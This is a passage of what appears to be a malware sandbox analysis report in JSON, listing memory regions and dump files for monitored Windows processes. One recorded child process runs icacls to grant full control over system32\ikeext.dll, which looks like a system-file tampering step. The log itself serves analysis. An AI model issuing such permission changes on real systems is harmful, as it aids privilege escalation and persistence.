[ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 2001600512, "type": "region", "version": 1 }, "end_va": 2001604607, "entry_point": 2001600512, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1018", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 2001600512, "timestamp": "00:00:47.599", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_1019", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:00:47.601", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001020-addr_0x000000007ffd8000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_203", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147319808, "type": "region", "version": 1 }, "end_va": 2147323903, "entry_point": 0, "filename": null, "id": "region_1020", "name": "private_0x000000007ffd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147319808, "timestamp": "00:00:47.601", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001021-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_204", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1021", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:00:47.601", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1022", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:47.621", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1023", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:00:47.621", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001024-addr_0x0000000000090000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_205", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 1638399, "entry_point": 0, "filename": null, "id": "region_1024", "name": "private_0x0000000000090000", "norm_filename": null, "region_type": "private_memory", "start_va": 589824, "timestamp": "00:00:47.622", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 2060287, "entry_point": 1638400, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1025", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1638400, "timestamp": "00:00:47.622", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001026-addr_0x0000000000440000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_206", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 4456448, "type": "region", "version": 1 }, "end_va": 4521983, "entry_point": 0, "filename": null, "id": "region_1026", "name": "private_0x0000000000440000", "norm_filename": null, "region_type": "private_memory", "start_va": 4456448, "timestamp": "00:00:47.623", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 1914372096, "type": "region", "version": 1 }, "end_va": 1914400767, "entry_point": 1914376752, "filename": "\\Windows\\System32\\winbrand.dll", "id": "region_1027", "name": "winbrand.dll", "norm_filename": "c:\\windows\\system32\\winbrand.dll", "region_type": "memory_mapped_file", "start_va": 1914372096, "timestamp": "00:00:47.623", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1967587328, "type": "region", "version": 1 }, "end_va": 1967890431, "entry_point": 1967619552, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_1028", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1967587328, "timestamp": "00:00:47.623", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1985544192, "type": "region", "version": 1 }, "end_va": 1986412543, "entry_point": 1985854948, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_1029", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985544192, "timestamp": "00:00:47.624", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1988280319, "entry_point": 1987617906, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_1030", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:00:47.624", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1988296704, "type": "region", "version": 1 }, "end_va": 1988337663, "entry_point": 1988301676, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_1031", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1988296704, "timestamp": "00:00:47.625", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 319488, "start_va": 1988362240, "type": "region", "version": 1 }, "end_va": 1988681727, "entry_point": 1988402185, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_1032", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1988362240, "timestamp": "00:00:47.625", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1988689920, "type": "region", "version": 1 }, "end_va": 1989513215, "entry_point": 1988810513, "filename": "\\Windows\\System32\\user32.dll", "id": "region_1033", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1988689920, "timestamp": "00:00:47.626", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1994784768, "type": "region", "version": 1 }, "end_va": 1995427839, "entry_point": 1994997719, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_1034", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1994784768, "timestamp": "00:00:47.626", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_1035", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:00:47.627", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 3211264, "type": "region", "version": 1 }, "end_va": 4030463, "entry_point": 0, "filename": null, "id": "region_1036", "name": "pagefile_0x0000000000310000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3211264, "timestamp": "00:00:47.630", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1971060736, "type": "region", "version": 1 }, "end_va": 1971896319, "entry_point": 1971066507, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_1037", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1971060736, "timestamp": "00:00:47.630", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 2000683008, "type": "region", "version": 1 }, "end_va": 2000809983, "entry_point": 2000687957, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_1038", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 2000683008, "timestamp": "00:00:47.631", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 356351, "entry_point": 0, "filename": null, "id": "region_1039", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:00:47.635", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 401407, "entry_point": 0, "filename": null, "id": "region_1040", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:00:47.635", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001041-addr_0x0000000000070000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_207", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 462847, "entry_point": 0, "filename": null, "id": "region_1041", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:00:47.635", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001042-addr_0x0000000000080000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_208", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 524288, "type": "region", "version": 1 }, "end_va": 528383, "entry_point": 0, "filename": null, "id": "region_1042", "name": "private_0x0000000000080000", "norm_filename": null, "region_type": "private_memory", "start_va": 524288, "timestamp": "00:00:47.635", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 4521984, "type": "region", "version": 1 }, "end_va": 5574655, "entry_point": 0, "filename": null, "id": "region_1043", "name": "pagefile_0x0000000000450000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4521984, "timestamp": "00:00:47.635", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 5636096, "type": "region", "version": 1 }, "end_va": 18219007, "entry_point": 0, "filename": null, "id": "region_1044", "name": "pagefile_0x0000000000560000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5636096, "timestamp": "00:00:47.636", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1454080, "start_va": 18219008, "type": "region", "version": 1 }, "end_va": 19673087, "entry_point": 0, "filename": null, "id": "region_1045", "name": "pagefile_0x0000000001160000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 18219008, "timestamp": "00:00:47.636", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 19726336, "type": "region", "version": 1 }, "end_va": 22671359, "entry_point": 19726336, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1046", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 19726336, "timestamp": "00:00:47.655", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "C:\\Windows\\system32\\cmd.exe /c \"icacls C:\\Windows\\system32\\ikeext.dll /grant system:F\"", "filename": "c:\\windows\\system32\\cmd.exe", "id": "proc_12", "image_name": "cmd.exe", "monitor_reason": "child_process", "monitored_id": 12, "origin_monitor_id": 6, "ref_parent_process": { "ref_id": "proc_6", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000012-region_00001097-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_217", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1097", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:47.977", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000012-region_00001098-addr_0x0000000000030000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_218", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 1245183, "entry_point": 0, "filename": null, "id": "region_1098", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:00:47.977", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1261567, "entry_point": 0, "filename": null, "id": "region_1099", "name": "pagefile_0x0000000000130000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1245184, "timestamp": "00:00:47.977", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1314815, "entry_point": 0, "filename": null, "id": "region_1100", "name": "pagefile_0x0000000000140000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1310720, "timestamp": "00:00:47.977", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 311296, "start_va": 1239744512, "type": "region", "version": 1 }, "end_va": 1240055807, "entry_point": 1239777946, "filename": "\\Windows\\System32\\cmd.exe", "id": "region_1101", "name": "cmd.exe", "norm_filename": "c:\\windows\\system32\\cmd.exe", "region_type": "memory_mapped_file", "start_va": 1239744512, "timestamp": "00:00:47.977", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 1999241216, "type": "region", "version": 1 }, "end_va": 2000535551, "entry_point": 1999241216, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1102", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1999241216, "timestamp": "00:00:47.978", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 2001600512, "type": "region", "version": 1 }, "end_va": 2001604607, "entry_point": 2001600512, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1103", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 2001600512, "timestamp": "00:00:47.978", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_1104", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:00:47.980", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000012-region_00001105-addr_0x000000007ffda000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_219", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147328000, "type": "region", "version": 1 }, "end_va": 2147332095, "entry_point": 0, "filename": null, "id": "region_1105", "name": "private_0x000000007ffda000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147328000, "timestamp": "00:00:47.981", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000012-region_00001106-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_220", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1106", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:00:47.981", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1107", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:48.001", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1108", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:00:48.001", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1798143, "entry_point": 1376256, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1109", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1376256, "timestamp": "00:00:48.001", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000012-region_00001110-addr_0x00000000001f0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_221", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 2097151, "entry_point": 0, "filename": null, "id": "region_1110", "name": "private_0x00000000001f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2031616, "timestamp": "00:00:48.002", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000012-region_00001111-addr_0x0000000000280000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_222", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 2621440, "type": "region", "version": 1 }, "end_va": 3670015, "entry_point": 0, "filename": null, "id": "region_1111", "name": "private_0x0000000000280000", "norm_filename": null, "region_type": "private_memory", "start_va": 2621440, "timestamp": "00:00:48.002", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 1914372096, "type": "region", "version": 1 }, "end_va": 1914400767, "entry_point": 1914376752, "filename": "\\Windows\\System32\\winbrand.dll", "id": "region_1112", "name": "winbrand.dll", "norm_filename": "c:\\windows\\system32\\winbrand.dll", "region_type": "memory_mapped_file", "start_va": 1914372096, "timestamp": "00:00:48.002", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1967587328, "type": "region", "version": 1 }, "end_va": 1967890431, "entry_point": 1967619552, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_1113", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1967587328, "timestamp": "00:00:48.003", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1985544192, "type": "region", "version": 1 }, "end_va": 1986412543, "entry_point": 1985854948, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_1114", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985544192, "timestamp": "00:00:48.003", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1988280319, "entry_point": 1987617906, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_1115", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:00:48.004", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1988296704, "type": "region", "version": 1 }, "end_va": 1988337663, "entry_point": 1988301676, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_1116", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1988296704, "timestamp": "00:00:48.004", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 319488, "start_va": 1988362240, "type": "region", "version": 1 }, "end_va": 1988681727, "entry_point": 1988402185, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_1117", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1988362240, "timestamp": "00:00:48.005", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1988689920, "type": "region", "version": 1 }, "end_va": 1989513215, "entry_point": 1988810513, "filename": "\\Windows\\System32\\user32.dll", "id": "region_1118", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1988689920, "timestamp": "00:00:48.005", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1994784768, "type": "region", "version": 1 }, "end_va": 1995427839, "entry_point": 1994997719, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_1119", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1994784768, "timestamp": "00:00:48.006", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_1120", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:00:48.006", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 3670016, "type": "region", "version": 1 }, "end_va": 4489215, "entry_point": 0, "filename": null, "id": "region_1121", "name": "pagefile_0x0000000000380000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3670016, "timestamp": "00:00:48.009", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1971060736, "type": "region", "version": 1 }, "end_va": 1971896319, "entry_point": 1971066507, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_1122", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1971060736, "timestamp": "00:00:48.009", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 2000683008, "type": "region", "version": 1 }, "end_va": 2000809983, "entry_point": 2000687957, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_1123", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 2000683008, "timestamp": "00:00:48.010", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 1835008, "type": "region", "version": 1 }, "end_va": 1863679, "entry_point": 0, "filename": null, "id": "region_1124", "name": "pagefile_0x00000000001c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1835008, "timestamp": "00:00:48.013", "type": "region", "version": 1 }, { "dump": { "filename": "", 